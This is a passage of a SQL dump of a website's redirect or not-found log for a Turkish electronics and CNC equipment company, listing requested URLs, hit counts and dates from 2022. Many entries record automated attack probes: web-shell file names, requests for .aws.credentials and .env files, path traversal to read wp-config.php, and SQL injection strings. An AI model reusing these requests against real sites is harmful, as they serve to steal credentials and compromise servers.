00:00:00',301),(29591,'http://3s-technologies.com.tr/tr/wp-includes/wp-class.php',NULL,'','',131,0,'2022-07-07 02:18:31','0000-00-00 00:00:00',301),(29592,'http://3s-technologies.com.tr/tr/wp-mna.php',NULL,'','',15,0,'2022-07-07 02:18:37','0000-00-00 00:00:00',301),(29593,'http://3s-technologies.com.tr/tr/wpx.php',NULL,'','',29,0,'2022-07-07 02:18:56','0000-00-00 00:00:00',301),(29594,'http://3s-technologies.com.tr/tr/xmrlpc.php',NULL,'','',290,0,'2022-07-07 02:19:32','0000-00-00 00:00:00',301),(29595,'http://3s-technologies.com.tr/tr/xz.php',NULL,'','',15,0,'2022-07-07 02:19:51','0000-00-00 00:00:00',301),(29596,'http://3s-technologies.com.tr/tr/yuuki.php',NULL,'','',16,0,'2022-07-07 02:19:57','0000-00-00 00:00:00',301),(29597,'https://3s-technologies.com.tr/assets/images/wp-plugins.php',NULL,'','',3,0,'2022-07-08 17:07:35','0000-00-00 00:00:00',301),(29598,'https://3s-technologies.com.tr/assets/images/wp-plugins.php',NULL,'','',1,0,'2022-07-08 17:07:35','0000-00-00 00:00:00',301),(29599,'http://3s-technologies.com.tr/tr/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php',NULL,'','',3,0,'2022-07-09 07:53:35','0000-00-00 00:00:00',301),(29600,'http://3s-technologies.com.tr/tr/images/brochures/panacim_en_20_0101.pdf',NULL,'','',4,0,'2022-07-10 03:06:20','0000-00-00 00:00:00',301),(29601,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2-detail',NULL,'','',1,0,'2022-07-10 03:35:37','0000-00-00 00:00:00',301),(29602,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,mf_name?language=tr-tr&keyword=',NULL,'','',2,0,'2022-07-10 18:12:50','0000-00-00 00:00:00',301),(29603,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2022-07-11 01:59:56','0000-00-00 00:00:00',301),(29604,'http://3s-technologies.com.tr/tr/wp-content/plugins/lbg-bottom-playlist-videoplayer/js/uploadify/uploadify.css',NULL,'','',3,0,'2022-07-11 07:28:06','0000-00-00 00:00:00',301),(29605,'https://3s-technologies.com.tr/index.php/en/products/smd-fırın',NULL,'','',21,0,'2022-07-11 15:21:38','0000-00-00 00:00:00',301),(29606,'https://3s-technologies.com.tr/tr/phpmyadmin/',NULL,'','',6,0,'2022-07-12 06:55:35','0000-00-00 00:00:00',301),(29607,'https://3s-technologies.com.tr/tr/pma/',NULL,'','',3,0,'2022-07-12 06:55:38','0000-00-00 00:00:00',301),(29608,'https://3s-technologies.com.tr/tr/myadmin/',NULL,'','',3,0,'2022-07-12 06:55:41','0000-00-00 00:00:00',301),(29609,'https://3s-technologies.com.tr/tr/sql/',NULL,'','',3,0,'2022-07-12 06:55:43','0000-00-00 00:00:00',301),(29610,'https://3s-technologies.com.tr/tr/mysql/',NULL,'','',3,0,'2022-07-12 06:55:45','0000-00-00 00:00:00',301),(29611,'https://3s-technologies.com.tr/tr/mysqladmin/',NULL,'','',3,0,'2022-07-12 06:55:46','0000-00-00 00:00:00',301),(29612,'https://3s-technologies.com.tr/tr/db/',NULL,'','',3,0,'2022-07-12 06:55:47','0000-00-00 00:00:00',301),(29613,'https://3s-technologies.com.tr/tr/database/',NULL,'','',3,0,'2022-07-12 06:55:50','0000-00-00 00:00:00',301),(29614,'https://3s-technologies.com.tr/tr/sql.php',NULL,'','',3,0,'2022-07-12 06:55:54','0000-00-00 00:00:00',301),(29615,'https://3s-technologies.com.tr/search.php',NULL,'','',3,0,'2022-07-12 10:46:40','0000-00-00 00:00:00',301),(29616,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2022-07-12 11:10:10','0000-00-00 00:00:00',301),(29617,'https://3s-technologies.com.tr/s_ne.php',NULL,'','',3,0,'2022-07-12 19:05:29','0000-00-00 00:00:00',301),(29618,'http://3s-technologies.com.tr/tr/wp-beckup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',3,0,'2022-07-12 20:10:42','0000-00-00 00:00:00',301),(29619,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-stream.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',2,0,'2022-07-12 20:10:42','0000-00-00 00:00:00',301),(29620,'http://3s-technologies.com.tr/tr/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',3,0,'2022-07-12 20:10:42','0000-00-00 00:00:00',301),(29621,'http://3s-technologies.com.tr/tr/wp-blog-post.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',4,0,'2022-07-12 20:10:42','0000-00-00 00:00:00',301),(29622,'http://3s-technologies.com.tr/tr/wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',3,0,'2022-07-12 20:10:42','0000-00-00 00:00:00',301),(29623,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',3,0,'2022-07-12 20:10:43','0000-00-00 00:00:00',301),(29624,'http://3s-technologies.com.tr/tr/wp-content/uploads/wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',3,0,'2022-07-12 20:10:43','0000-00-00 00:00:00',301),(29625,'http://3s-technologies.com.tr/tr/wp-stream.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',4,0,'2022-07-12 20:10:44','0000-00-00 00:00:00',301),(29626,'http://3s-technologies.com.tr/.aws.credentials',NULL,'','',1,0,'2022-07-13 04:29:31','0000-00-00 00:00:00',301),(29627,'https://3s-technologies.com.tr/.aws.credentials',NULL,'','',1,0,'2022-07-13 04:29:32','0000-00-00 00:00:00',301),(29628,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/smd-fä±rä±n/dirdesc?language=tr-tr&keyword=',NULL,'','',3,0,'2022-07-13 13:35:46','0000-00-00 00:00:00',301),(29629,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/dirdesc?language=tr-tr&keyword=',NULL,'','',2,0,'2022-07-13 22:01:48','0000-00-00 00:00:00',301),(29630,'http://3s-technologies.com.tr/.env.credentials',NULL,'','',1,0,'2022-07-14 02:57:31','0000-00-00 00:00:00',301),(29631,'https://3s-technologies.com.tr/.env.credentials',NULL,'','',1,0,'2022-07-14 02:57:32','0000-00-00 00:00:00',301),(29632,'http://3s-technologies.com.tr/tr/admin/php/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2022-07-14 03:59:02','0000-00-00 00:00:00',301),(29633,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spg-detail',NULL,'','',1,0,'2022-07-14 12:30:14','0000-00-00 00:00:00',301),(29634,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2022-07-14 18:01:11','0000-00-00 00:00:00',301),(29635,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-41-42-detail',NULL,'','',2,0,'2022-07-15 02:05:39','0000-00-00 00:00:00',301),(29636,'http://3s-technologies.com.tr/tr/wp-content/plugins/contus-hd-flv-player/uploadvideo.php',NULL,'','',4,0,'2022-07-15 15:28:00','0000-00-00 00:00:00',301),(29637,'https://3s-technologies.com.tr/tr/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\" union select null,null,0x54683173317374337374,null,null,null,null,null-- aa',NULL,'','',2,0,'2022-07-16 08:43:09','0000-00-00 00:00:00',301),(29638,'http://3s-technologies.com.tr/tr/wp-content/plugins/contus-video-galleryversion-10/upload1.php',NULL,'','',2,0,'2022-07-17 04:02:44','0000-00-00 00:00:00',301),(29639,'http://3s-technologies.com.tr/tr/wp-content/plugins/html5avmanager/lib/uploadify/uploadify.css',NULL,'','',3,0,'2022-07-18 15:00:30','0000-00-00 00:00:00',301),(29640,'https://3s-technologies.com.tr/cache.php',NULL,'','',4,0,'2022-07-19 08:23:01','0000-00-00 00:00:00',301),(29641,'https://3s-technologies.com.tr/wp-includes/shell20211028.php',NULL,'','',3,0,'2022-07-19 23:18:55','0000-00-00 00:00:00',301),(29642,'http://3s-technologies.com.tr/xampp/phpinfo.php',NULL,'','',1,0,'2022-07-20 04:23:36','0000-00-00 00:00:00',301),(29643,'https://3s-technologies.com.tr/xampp/phpinfo.php',NULL,'','',1,0,'2022-07-20 04:23:37','0000-00-00 00:00:00',301),(29644,'http://3s-technologies.com.tr/tr/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php',NULL,'','',3,0,'2022-07-20 04:36:39','0000-00-00 00:00:00',301),(29645,'https://3s-technologies.com.tr/tr/?option=com_content\'nvopzp; and 1=1 or (<\'\">iko)),&view=article\'nvopzp; and 1=1 or (<\'\">iko)),&id=61\'nvopzp; and 1=1 or (<\'\">iko)),&itemid=83\'nvopzp; and 1=1 or (<\'\">iko)),&lang=tr\'nvopzp; and 1=1 or (<\'\">iko)),',NULL,'https://3s-technologies.com.tr/index.php?option=com_content%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&view=article%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&id=61%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&Itemid=83%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),&lang=tr%27nvOpzp;%20AND%201=1%20OR%20(%3C%27%22%3EiKO)),','',2,0,'2022-07-20 13:54:19','0000-00-00 00:00:00',301),(29646,'https://3s-technologies.com.tr/wp-admin/sistem.php',NULL,'','',3,0,'2022-07-20 15:38:17','0000-00-00 00:00:00',301),(29647,'http://3s-technologies.com.tr/tr/assets/js/app1.js',NULL,'','',1,0,'2022-07-20 20:20:14','0000-00-00 00:00:00',301),(29648,'https://3s-technologies.com.tr/wp-includes/class-wp-page-icon.php',NULL,'','',3,0,'2022-07-21 07:10:58','0000-00-00 00:00:00',301),(29649,'http://3s-technologies.com.tr/tr/wp-content/plugins/mm-forms/includes/doajaxfileupload.php',NULL,'','',3,0,'2022-07-21 13:34:34','0000-00-00 00:00:00',301),(29650,'https://3s-technologies.com.tr/license.php?mod_security&ws',NULL,'','',3,0,'2022-07-21 23:20:29','0000-00-00 00:00:00',301),(29651,'http://3s-technologies.com.tr/tr/wood-processing-ahåÿap-iåÿleme',NULL,'','',2,0,'2022-07-22 10:10:10','0000-00-00 00:00:00',301),(29652,'https://3s-technologies.com.tr/wp-includes/sistem.php',NULL,'','',3,0,'2022-07-22 13:11:31','0000-00-00 00:00:00',301),(29653,'http://3s-technologies.com.tr/tr/makhdamxehadshell.php',NULL,'','',2,0,'2022-07-23 00:47:39','0000-00-00 00:00:00',301),(29654,'https://3s-technologies.com.tr/sistem.php',NULL,'','',3,0,'2022-07-23 02:44:31','0000-00-00 00:00:00',301),(29655,'http://3s-technologies.com.tr/tr/js/uploader/upload.php',NULL,'','',1,0,'2022-07-23 05:03:50','0000-00-00 00:00:00',301),(29656,'https://www.3s-technologies.com.tr/tr/?itemid=429',NULL,'','',4,0,'2022-07-23 20:23:27','0000-00-00 00:00:00',301),(29657,'https://3s-technologies.com.tr/wp-content/sistem.php',NULL,'','',3,0,'2022-07-24 00:44:31','0000-00-00 00:00:00',301),(29658,'http://3s-technologies.com.tr/tr/wp-content/plugins/gallery-plugin/upload/php.php',NULL,'','',2,0,'2022-07-24 06:45:30','0000-00-00 00:00:00',301),(29659,'http://3s-technologies.com.tr/wp-includes/css/wp-config.php',NULL,'anonymousfox.co','',1,0,'2022-07-25 01:43:07','0000-00-00 00:00:00',301),(29660,'http://3s-technologies.com.tr/tr/ahåÿap-iåÿleme-wood-processing-120cm',NULL,'','',2,0,'2022-07-25 05:01:48','0000-00-00 00:00:00',301),(29661,'http://www.3s-technologies.com.tr/en/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',30,0,'2022-07-26 21:25:57','0000-00-00 00:00:00',301),(29662,'http://3s-technologies.com.tr/tr/wp-content/plugins/ninja-forms/readme.txt',NULL,'','',1,0,'2022-07-26 22:55:09','0000-00-00 00:00:00',301),(29663,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',10,0,'2022-07-27 06:17:26','0000-00-00 00:00:00',301),(29664,'http://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping',NULL,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/plugins','',182,0,'2022-07-27 07:18:02','0000-00-00 00:00:00',301),(29665,'https://3s-technologies.com.tr/en/de',NULL,'','',17,0,'2022-07-28 14:29:52','0000-00-00 00:00:00',301),(29666,'https://3s-technologies.com.tr/sys-cache/index.php',NULL,'','',3,0,'2022-07-28 14:58:16','0000-00-00 00:00:00',301),(29667,'http://www.3s-technologies.com.tr/tr/aluminyum-işleme-aluminum-processing',NULL,'','',276,0,'2022-07-29 03:52:23','0000-00-00 00:00:00',301),(29668,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/akrilik-işleme-acrylic-processing',NULL,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/%C3%BCr%C3%BCnler/manufacturer/tolo/dalga-lehim/by,%60p%60.product_sku/dirDesc?language=tr-TR&keyword','',30,0,'2022-07-29 03:59:08','0000-00-00 00:00:00',301),(29669,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/aluminyum-işleme-aluminum-processing',NULL,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/%C3%BCr%C3%BCnler/cnc/by,mf_name?language=tr-TR&keyword','',30,0,'2022-07-29 06:20:06','0000-00-00 00:00:00',301),(29670,'http://www.3s-technologies.com.tr/tr/wood-processing-ahşap-işleme',NULL,'','',278,0,'2022-07-29 09:00:40','0000-00-00 00:00:00',301),(29671,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/akrilik-işleme-acrylic-processing',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/%C3%BCr%C3%BCnler/manufacturer/ddm-novastar/screen-printer/by,%60p%60.product_sku?language=tr-TR&keyword','',40,0,'2022-07-29 11:43:55','0000-00-00 00:00:00',301),(29672,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-prototip-prototyping',NULL,'','',22,0,'2022-07-29 12:01:16','0000-00-00 00:00:00',301),(29673,'https://3s-technologies.com.tr/en/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',8,0,'2022-07-30 01:40:38','0000-00-00 00:00:00',301),(29674,'https://3s-technologies.com.tr/tr/pcb-prototip-prototyping',NULL,'','',2177,0,'2022-07-30 03:54:07','0000-00-00 00:00:00',301),(29675,'https://3s-technologies.com.tr/tr/wood-processing-ahşap-işleme',NULL,'','',958,0,'2022-07-30 03:54:09','0000-00-00 00:00:00',301),(29676,'https://3s-technologies.com.tr/tr/akrilik-işleme-acrylic-processing',NULL,'','',971,0,'2022-07-30 03:54:10','0000-00-00 00:00:00',301),(29677,'https://3s-technologies.com.tr/tr/aluminyum-işleme-aluminum-processing',NULL,'','',953,0,'2022-07-30 03:54:12','0000-00-00 00:00:00',301),(29678,'https://3s-technologies.com.tr/assets/images/s_ne.php',NULL,'','',3,0,'2022-07-30 15:02:07','0000-00-00 00:00:00',301),(29679,'http://www.3s-technologies.com.tr/en/using-joomla/extensions/templates/beez-2/home-page-beez-2/79-english-uk/88-eko-cnc-en',NULL,'','',16,0,'2022-07-30 20:10:37','0000-00-00 00:00:00',301),(29680,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2022-07-31 00:57:02','0000-00-00 00:00:00',301),(29681,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/templates/atomic/home-page-atomic/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'http://www.3s-technologies.com.tr/tr/using-joomla/extensions/templates/atomic/home-page-atomic','',6,0,'2022-07-31 17:09:12','0000-00-00 00:00:00',301),(29682,'http://3s-technologies.com.tr/tr/administrator/templates/beez3/error.php',NULL,'','',1,0,'2022-07-31 18:59:35','0000-00-00 00:00:00',301),(29683,'https://www.3s-technologies.com.tr/tr/aluminyum-işleme-aluminum-processing',NULL,'','',176,0,'2022-07-31 20:43:43','0000-00-00 00:00:00',301),(29684,'https://3s-technologies.com.tr/en/admin/view/stylesheet/accesson.php',NULL,'','',3,0,'2022-08-01 14:59:53','0000-00-00 00:00:00',301),(29685,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2022-08-01 22:01:26','0000-00-00 00:00:00',301),(29686,'http://3s-technologies.com.tr/tr/wood-processing-ahşap-işleme',NULL,'http://3s-technologies.com.tr/tr/%C3%BCr%C3%BCnler/manufacturer/ddm-novastar/smd-f%C4%B1r%C4%B1n?language=tr-TR&keyword','',112,0,'2022-08-02 15:58:19','0000-00-00 00:00:00',301),(29687,'https://3s-technologies.com.tr/tr/windex.php',NULL,'https://3s-technologies.com.tr/windex.php','',1,0,'2022-08-03 04:42:50','0000-00-00 00:00:00',301),(29688,'https://3s-technologies.com.tr/tr/accesson.php',NULL,'https://3s-technologies.com.tr/accesson.php','',5,0,'2022-08-03 04:42:52','0000-00-00 00:00:00',301),(29689,'https://3s-technologies.com.tr/tr/wp-slicemap.php',NULL,'https://3s-technologies.com.tr/wp-slicemap.php','',1,0,'2022-08-03 04:42:53','0000-00-00 00:00:00',301),(29690,'https://3s-technologies.com.tr/tr/slicemap.php',NULL,'https://3s-technologies.com.tr/slicemap.php','',1,0,'2022-08-03 04:42:54','0000-00-00 00:00:00',301),(29691,'https://3s-technologies.com.tr/tr/wp-commentin.php',NULL,'https://3s-technologies.com.tr/wp-commentin.php','',1,0,'2022-08-03 04:42:55','0000-00-00 00:00:00',301),(29692,'https://3s-technologies.com.tr/tr/wikiindex.php',NULL,'https://3s-technologies.com.tr/wikiindex.php','',1,0,'2022-08-03 04:42:56','0000-00-00 00:00:00',301),(29693,'https://3s-technologies.com.tr/tr/wp-stream.php',NULL,'https://3s-technologies.com.tr/wp-stream.php','',1,0,'2022-08-03 04:43:00','0000-00-00 00:00:00',301),(29694,'https://3s-technologies.com.tr/tr/wp-option.php',NULL,'https://3s-technologies.com.tr/wp-option.php','',1,0,'2022-08-03 04:43:01','0000-00-00 00:00:00',301),(29695,'https://3s-technologies.com.tr/tr/wp-clearline.php',NULL,'https://3s-technologies.com.tr/wp-clearline.php','',1,0,'2022-08-03 04:43:02','0000-00-00 00:00:00',301),(29696,'https://3s-technologies.com.tr/tr/wp-blockup.php',NULL,'https://3s-technologies.com.tr/wp-blockup.php','',1,0,'2022-08-03 04:43:03','0000-00-00 00:00:00',301),(29697,'https://3s-technologies.com.tr/tr/un.php',NULL,'https://3s-technologies.com.tr/un.php','',1,0,'2022-08-03 04:43:05','0000-00-00 00:00:00',301),(29698,'https://3s-technologies.com.tr/tr/blue.php',NULL,'https://3s-technologies.com.tr/blue.php','',1,0,'2022-08-03 04:43:08','0000-00-00 00:00:00',301),(29699,'https://3s-technologies.com.tr/tr/wp-blog-post.php',NULL,'https://3s-technologies.com.tr/wp-blog-post.php','',1,0,'2022-08-03 04:43:09','0000-00-00 00:00:00',301),(29700,'https://3s-technologies.com.tr/tr/wp-plain.php',NULL,'https://3s-technologies.com.tr/wp-plain.php','',1,0,'2022-08-03 04:43:10','0000-00-00 00:00:00',301),(29701,'https://3s-technologies.com.tr/tr/wp-craft-report.php',NULL,'https://3s-technologies.com.tr/wp-craft-report.php','',1,0,'2022-08-03 04:43:11','0000-00-00 00:00:00',301),(29702,'https://3s-technologies.com.tr/tr/s_e.php',NULL,'https://3s-technologies.com.tr/s_e.php','',1,0,'2022-08-03 04:43:12','0000-00-00 00:00:00',301),(29703,'https://3s-technologies.com.tr/tr/s_ne.php',NULL,'https://3s-technologies.com.tr/s_ne.php','',1,0,'2022-08-03 04:43:13','0000-00-00 00:00:00',301),(29704,'https://3s-technologies.com.tr/tr/outcms.php',NULL,'https://3s-technologies.com.tr/outcms.php','',1,0,'2022-08-03 04:43:14','0000-00-00 00:00:00',301),(29705,'https://3s-technologies.com.tr/tr/th3_alpha.php',NULL,'https://3s-technologies.com.tr/th3_alpha.php','',1,0,'2022-08-03 04:43:15','0000-00-00 00:00:00',301),(29706,'https://3s-technologies.com.tr/tr/upload_index.php',NULL,'https://3s-technologies.com.tr/upload_index.php','',1,0,'2022-08-03 04:43:16','0000-00-00 00:00:00',301),(29707,'https://3s-technologies.com.tr/tr/upload.php',NULL,'https://3s-technologies.com.tr/upload.php','',7,0,'2022-08-03 04:43:17','0000-00-00 00:00:00',301),(29708,'https://3s-technologies.com.tr/tr/smtphec.php',NULL,'https://3s-technologies.com.tr/smtphec.php','',1,0,'2022-08-03 04:43:18','0000-00-00 00:00:00',301),(29709,'https://3s-technologies.com.tr/tr/wp-supports.php',NULL,'https://3s-technologies.com.tr/wp-supports.php','',1,0,'2022-08-03 04:43:20','0000-00-00 00:00:00',301),(29710,'https://3s-technologies.com.tr/tr/votes.php',NULL,'https://3s-technologies.com.tr/votes.php','',1,0,'2022-08-03 04:43:21','0000-00-00 00:00:00',301),(29711,'https://3s-technologies.com.tr/tr/wp-mail.php',NULL,'https://3s-technologies.com.tr/wp-mail.php','',3,0,'2022-08-03 04:43:22','0000-00-00 00:00:00',301),(29712,'https://3s-technologies.com.tr/tr/load.php',NULL,'https://3s-technologies.com.tr/load.php','',1,0,'2022-08-03 04:43:23','0000-00-00 00:00:00',301),(29713,'https://3s-technologies.com.tr/tr/wp-blockdown.php',NULL,'https://3s-technologies.com.tr/wp-blockdown.php','',1,0,'2022-08-03 04:43:24','0000-00-00 00:00:00',301),(29714,'https://3s-technologies.com.tr/tr/wpecho.php',NULL,'https://3s-technologies.com.tr/wpecho.php','',1,0,'2022-08-03 04:43:25','0000-00-00 00:00:00',301),(29715,'https://3s-technologies.com.tr/tr/d2.php',NULL,'https://3s-technologies.com.tr/d2.php','',1,0,'2022-08-03 04:43:26','0000-00-00 00:00:00',301),(29716,'https://3s-technologies.com.tr/tr/infodat.php',NULL,'https://3s-technologies.com.tr/infodat.php','',1,0,'2022-08-03 04:43:27','0000-00-00 00:00:00',301),(29717,'https://3s-technologies.com.tr/tr/webdata.php',NULL,'https://3s-technologies.com.tr/webdata.php','',1,0,'2022-08-03 04:43:28','0000-00-00 00:00:00',301),(29718,'https://3s-technologies.com.tr/tr/local.php',NULL,'https://3s-technologies.com.tr/local.php','',1,0,'2022-08-03 04:43:29','0000-00-00 00:00:00',301),(29719,'https://3s-technologies.com.tr/tr/web.php',NULL,'https://3s-technologies.com.tr/web.php','',3,0,'2022-08-03 04:43:30','0000-00-00 00:00:00',301),(29720,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/screen-printer?language=tr-tr&keyword=',NULL,'','',2,0,'2022-08-03 08:45:16','0000-00-00 00:00:00',301),(29721,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/smd-fä±rä±n/by,mf_name?language=tr-tr&keyword=',NULL,'','',3,0,'2022-08-03 11:17:57','0000-00-00 00:00:00',301),(29722,'https://3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/81-panasonic-am100-kampanya-2',NULL,'','',70,0,'2022-08-04 08:32:55','0000-00-00 00:00:00',301),(29723,'http://3s-technologies.com.tr/en/wp-config.php.bak',NULL,'','',6,0,'2022-08-04 09:06:20','0000-00-00 00:00:00',301),(29724,'http://3s-technologies.com.tr/en/wp-config.php.old',NULL,'','',2,0,'2022-08-04 09:06:26','0000-00-00 00:00:00',301),(29725,'http://3s-technologies.com.tr/en/wp-content/plugins/site-import/admin/page.php?url=../../../../wp-config.php',NULL,'','',1,0,'2022-08-04 09:06:38','0000-00-00 00:00:00',301),(29726,'http://3s-technologies.com.tr/en/wp-content/themes/lote27/download.php?download=../../../wp-config.php',NULL,'','',1,0,'2022-08-04 09:06:56','0000-00-00 00:00:00',301),(29727,'http://3s-technologies.com.tr/en/myzoomsounds?action=dzsap_download&link=../wp-config.php',NULL,'','',1,0,'2022-08-04 09:07:00','0000-00-00 00:00:00',301),(29728,'http://3s-technologies.com.tr/en/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php',NULL,'','',2,0,'2022-08-04 09:07:10','0000-00-00 00:00:00',301),(29729,'http://3s-technologies.com.tr/en/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php',NULL,'','',1,0,'2022-08-04 09:07:23','0000-00-00 00:00:00',301),(29730,'http://3s-technologies.com.tr/en/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php',NULL,'','',1,0,'2022-08-04 09:07:30','0000-00-00 00:00:00',301),(29731,'http://3s-technologies.com.tr/en/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/wp-config.php',NULL,'','',1,0,'2022-08-04 09:07:35','0000-00-00 00:00:00',301),(29732,'http://3s-technologies.com.tr/en/wp-content/themes/theloft/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-08-04 09:07:49','0000-00-00 00:00:00',301),(29733,'http://3s-technologies.com.tr/tr/curvy.php',NULL,'','',1,0,'2022-08-04 13:02:34','0000-00-00 00:00:00',301),(29734,'http://3s-technologies.com.tr/tr/wp-js.php?phpshells',NULL,'','',1,0,'2022-08-04 13:02:42','0000-00-00 00:00:00',301),(29735,'http://3s-technologies.com.tr/tr/wp-content/plugins/sid/up.php',NULL,'','',1,0,'2022-08-04 13:03:18','0000-00-00 00:00:00',301),(29736,'http://3s-technologies.com.tr/tr/wp-content/plugins/ubh/up.php',NULL,'','',16,0,'2022-08-04 13:03:25','0000-00-00 00:00:00',301),(29737,'http://3s-technologies.com.tr/tr/wp-content/haccess.php?send=ok',NULL,'','',1,0,'2022-08-04 13:03:31','0000-00-00 00:00:00',301),(29738,'http://3s-technologies.com.tr/tr/haccess.php?send=ok',NULL,'','',1,0,'2022-08-04 13:03:38','0000-00-00 00:00:00',301),(29739,'http://3s-technologies.com.tr/tr/ty.php',NULL,'','',198,0,'2022-08-04 13:03:50','0000-00-00 00:00:00',301),(29740,'http://3s-technologies.com.tr/tr/haxo.php',NULL,'','',1,0,'2022-08-04 13:04:04','0000-00-00 00:00:00',301),(29741,'http://3s-technologies.com.tr/tr/votes.php',NULL,'','',1,0,'2022-08-04 13:04:11','0000-00-00 00:00:00',301),(29742,'http://3s-technologies.com.tr/tr/wpconfig.bak.php?act=ul',NULL,'','',2,0,'2022-08-04 13:04:18','0000-00-00 00:00:00',301),(29743,'http://3s-technologies.com.tr/tr/wp-content/wpconfig.bak.php?act=ul',NULL,'','',1,0,'2022-08-04 13:04:26','0000-00-00 00:00:00',301),(29744,'http://3s-technologies.com.tr/tr/wp-content/plugins/wpconfig.bak.php?act=ul',NULL,'','',1,0,'2022-08-04 13:04:33','0000-00-00 00:00:00',301),(29745,'http://3s-technologies.com.tr/tr/wp-content/themes/wpconfig.bak.php?act=ul',NULL,'','',1,0,'2022-08-04 13:04:39','0000-00-00 00:00:00',301),(29746,'http://3s-technologies.com.tr/tr/wp-commentin.php',NULL,'','',36,0,'2022-08-04 20:58:10','0000-00-00 00:00:00',301),(29747,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-prototip-prototyping',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/%C3%BCr%C3%BCnler/manufacturer/tolo/smd-f%C4%B1r%C4%B1n/by,product_sku?language=tr-TR&keyword','',50,0,'2022-08-04 21:57:49','0000-00-00 00:00:00',301),(29748,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/aluminyum-işleme-aluminum-processing',NULL,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/%C3%BCr%C3%BCnler/manufacturer/tolo/smd-f%C4%B1r%C4%B1n/by,pc.ordering,product_name/dirDesc?language=tr-TR&keyword','',36,0,'2022-08-05 06:40:45','0000-00-00 00:00:00',301),(29749,'http://www.3s-technologies.com.tr/tr/akrilik-işleme-acrylic-processing',NULL,'','',276,0,'2022-08-05 23:30:21','0000-00-00 00:00:00',301),(29750,'https://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/mirae',NULL,'','',4,0,'2022-08-07 00:20:39','0000-00-00 00:00:00',301),(29751,'http://3s-technologies.com.tr/tr/admin/api.update/tree',NULL,'','',1,0,'2022-08-07 06:12:35','0000-00-00 00:00:00',301),(29752,'http://3s-technologies.com.tr/tr/admin/api.update/node',NULL,'','',1,0,'2022-08-07 06:12:36','0000-00-00 00:00:00',301),(29753,'http://3s-technologies.com.tr/tr/phpqrcode/readme',NULL,'','',1,0,'2022-08-07 06:12:36','0000-00-00 00:00:00',301),(29754,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama',NULL,'','',2,0,'2022-08-07 07:33:11','0000-00-00 